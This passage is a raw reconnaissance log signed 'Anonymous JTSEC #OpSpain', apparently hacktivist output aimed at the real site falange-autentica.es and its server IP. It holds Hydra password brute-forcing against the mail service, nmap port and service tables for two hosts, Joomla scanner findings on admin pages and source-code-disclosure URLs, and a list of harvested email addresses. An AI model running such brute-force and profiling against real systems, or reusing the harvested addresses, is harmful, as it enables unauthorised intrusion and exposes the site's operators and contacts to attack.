  3035. + -- --=[Port 514 closed... skipping.
  3036. + -- --=[Port 993 opened... running tests...
  3037. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3038.  
  3039. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:54
  3040. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  3041. [DATA] attacking imaps://91.121.2.184:993/993
  3042. [STATUS] 133.00 tries/min, 133 tries in 00:01h, 1400 to do in 00:11h, 1 active
  3043. [STATUS] 133.67 tries/min, 401 tries in 00:03h, 1132 to do in 00:09h, 1 active
  3044. [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
  3045. 1 of 1 target completed, 0 valid passwords found
  3046. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:25
  3047. + -- --=[Port 1433 closed... skipping.
  3048. + -- --=[Port 1521 closed... skipping.
  3049. + -- --=[Port 3306 closed... skipping.
  3050. + -- --=[Port 3389 closed... skipping.
  3051. + -- --=[Port 5432 closed... skipping.
  3052. + -- --=[Port 5900 closed... skipping.
  3053. + -- --=[Port 5901 closed... skipping.
  3054. + -- --=[Port 8000 closed... skipping.
  3055. + -- --=[Port 8080 opened... running tests...
  3056. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3057.  
  3058. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:25
  3059. + -- --=[Port 8100 closed... skipping.
  3060. + -- --=[Port 6667 closed... skipping.
  3061. #######################################################################################################################################
  3062.  
  3063. * default
  3064. * default
  3065. [*] Importing 'Nmap XML' data
  3066. [*] Import: Parsing with 'Nokogiri v1.8.5'
  3067. [*] Importing host 91.121.2.184
  3068. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184-udp.xml
  3069. [*] Importing 'Nmap XML' data
  3070. [*] Import: Parsing with 'Nokogiri v1.8.5'
  3071. [*] Importing host 91.121.2.184
  3072. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-udp-91.121.2.184.xml
  3073. [*] Importing 'Nmap XML' data
  3074. [*] Import: Parsing with 'Nokogiri v1.8.5'
  3075. [*] Importing host 91.121.2.184
  3076. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184.xml
  3077.  
  3078. Hosts
  3079. =====
  3080.  
  3081. address mac name os_name os_flavor os_sp purpose info comments
  3082. ------- --- ---- ------- --------- ----- ------- ---- --------
  3083. 91.121.2.184 Linux 2.6.X server
  3084. 195.55.47.89 Windows 3.X device
  3085.  
  3086. Services
  3087. ========
  3088.  
  3089. host port proto name state info
  3090. ---- ---- ----- ---- ----- ----
  3091. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
  3092. 91.121.2.184 25 tcp smtp closed
  3093. 91.121.2.184 53 udp domain unknown
  3094. 91.121.2.184 67 udp dhcps unknown
  3095. 91.121.2.184 68 udp dhcpc unknown
  3096. 91.121.2.184 69 udp tftp unknown
  3097. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
  3098. 91.121.2.184 88 udp kerberos-sec unknown
  3099. 91.121.2.184 123 udp ntp unknown
  3100. 91.121.2.184 137 udp netbios-ns filtered
  3101. 91.121.2.184 138 udp netbios-dgm filtered
  3102. 91.121.2.184 139 tcp netbios-ssn closed
  3103. 91.121.2.184 139 udp netbios-ssn unknown
  3104. 91.121.2.184 161 udp snmp unknown
  3105. 91.121.2.184 162 udp snmptrap unknown
  3106. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
  3107. 91.121.2.184 389 udp ldap unknown
  3108. 91.121.2.184 443 tcp ssl/http open Apache httpd PHP 5.6.14
  3109. 91.121.2.184 445 tcp microsoft-ds closed
  3110. 91.121.2.184 465 tcp ssl/smtps open
  3111. 91.121.2.184 520 udp route unknown
  3112. 91.121.2.184 993 tcp ssl/imaps open
  3113. 91.121.2.184 2049 udp nfs unknown
  3114. 91.121.2.184 7071 tcp ssl/iwg1 open
  3115. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
  3116. 195.55.47.89 25 tcp smtp closed
  3117. 195.55.47.89 53 udp domain unknown
  3118. 195.55.47.89 67 udp dhcps unknown
  3119. 195.55.47.89 68 udp dhcpc unknown
  3120. 195.55.47.89 69 udp tftp unknown
  3121. 195.55.47.89 80 tcp http-proxy open Squid http proxy
  3122. 195.55.47.89 88 udp kerberos-sec unknown
  3123. 195.55.47.89 113 tcp ident closed
  3124. 195.55.47.89 123 udp ntp unknown
  3125. 195.55.47.89 137 udp netbios-ns filtered
  3126. 195.55.47.89 138 udp netbios-dgm filtered
  3127. 195.55.47.89 139 tcp netbios-ssn closed
  3128. 195.55.47.89 139 udp netbios-ssn unknown
  3129. 195.55.47.89 161 udp snmp unknown
  3130. 195.55.47.89 162 udp snmptrap unknown
  3131. 195.55.47.89 389 udp ldap unknown
  3132. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
  3133. 195.55.47.89 445 tcp microsoft-ds closed
  3134. 195.55.47.89 520 udp route unknown
  3135. 195.55.47.89 2049 udp nfs unknown
  3136. =======================================================================================================================================
  3137. #######################################################################################################################################
  3138. [+] FireWall Detector
  3139. [++] Firewall not detected
  3140.  
  3141. [+] Detecting Joomla Version
  3142. [++] Joomla 3.8.10
  3143.  
  3144. [+] Core Joomla Vulnerability
  3145. [++] Target Joomla core is not vulnerable
  3146.  
  3147. [+] Checking apache info/status files
  3148. [++] Readable info/status files are not found
  3149.  
  3150. [+] admin finder
  3151. [++] Admin page : http://falange-autentica.es/administrator/
  3152.  
  3153. [+] Checking robots.txt existing
  3154. [++] robots.txt is found
  3155. path : http://falange-autentica.es/robots.txt
  3156.  
  3157. Interesting path found from robots.txt
  3158. http://falange-autentica.es/joomla/administrator/
  3159. http://falange-autentica.es/administrator/
  3160. http://falange-autentica.es/bin/
  3161. http://falange-autentica.es/cache/
  3162. http://falange-autentica.es/cli/
  3163. http://falange-autentica.es/components/
  3164. http://falange-autentica.es/includes/
  3165. http://falange-autentica.es/installation/
  3166. http://falange-autentica.es/language/
  3167. http://falange-autentica.es/layouts/
  3168. http://falange-autentica.es/libraries/
  3169. http://falange-autentica.es/logs/
  3170. http://falange-autentica.es/modules/
  3171. http://falange-autentica.es/plugins/
  3172. http://falange-autentica.es/tmp/
  3173.  
  3174.  
  3175. [+] Finding common backup files name
  3176. [++] Backup files are not found
  3177.  
  3178. [+] Finding common log files name
  3179. [++] error log is not found
  3180.  
  3181. [+] Checking sensitive config.php.x file
  3182. [++] Readable config files are not found
  3229. #######################################################################################################################################
  3230. | Check robots.txt:
  3231. | [+] # If the Joomla site is installed within a folder such as at
  3232. | [+] # e.g. www.example.com/joomla/ the robots.txt file MUST be
  3233. | [+] # moved to the site root at e.g. www.example.com/robots.txt
  3234. | [+] # AND the joomla folder name MUST be prefixed to the disallowed
  3235. | [+] # path, e.g. the Disallow rule for the /administrator/ folder
  3236. | [+] # MUST be changed to read Disallow: /joomla/administrator/
  3237. | [+] #
  3238. | [+] # For more information about the robots.txt standard, see:
  3239. | [+] # http://www.robotstxt.org/orig.html
  3240. | [+] #
  3241. | [+] # For syntax checking, see:
  3242. | [+] # http://tool.motoricerca.info/robots-checker.phtml
  3243. | [+]
  3244. | [+] User-agent: *
  3245. | [+] Disallow: /administrator/
  3246. | [+] Disallow: /bin/
  3247. | [+] Disallow: /cache/
  3248. | [+] Disallow: /cli/
  3249. | [+] Disallow: /components/
  3250. | [+] Disallow: /includes/
  3251. | [+] Disallow: /installation/
  3252. | [+] Disallow: /language/
  3253. | [+] Disallow: /layouts/
  3254. | [+] Disallow: /libraries/
  3255. | [+] Disallow: /logs/
  3256. | [+] Disallow: /modules/
  3257. | [+] Disallow: /plugins/
  3258. | [+] Disallow: /tmp/
  3259. #######################################################################################################################################
  3260. | External hosts:
  3348. #######################################################################################################################################
  3349. | Source Code Disclosure:
  3350. | [+] Source Code Found: http://falange-autentica.es/imagenes/5-acto-publico-de-fa-en-alicante-2016/detail/191-dia-de-fa-en-alicante?tmpl=component&phocadownload=2
  3351. | [+] Source Code Found: http://falange-autentica.es/imagenes/16-historia/detail/243-no-volem-solsament-canviar-de-govern-volem-canviar-la-vida?tmpl=component&phocadownload=2
  3352. |
  3353. | FCKeditor File Upload:
  3354. |
  3355. | E-mails:
  3356. | [+] E-mail Found: n@falange-autentica.org
  3357. | [+] E-mail Found: 2@t.2
  3358. | [+] E-mail Found: 7m@i.d
  3359. | [+] E-mail Found: comunicacion@falange-autentica.es
  3360. | [+] E-mail Found: contactar@falange-autentica.es
  3361. | [+] E-mail Found: y0@7.ty
  3362. | [+] E-mail Found: canarias@falange-autentica.org
  3363. =======================================================================================================================================
  3364. ######################################################################################################################################
  3365. Anonymous JTSEC #OpSpain Full Recon #2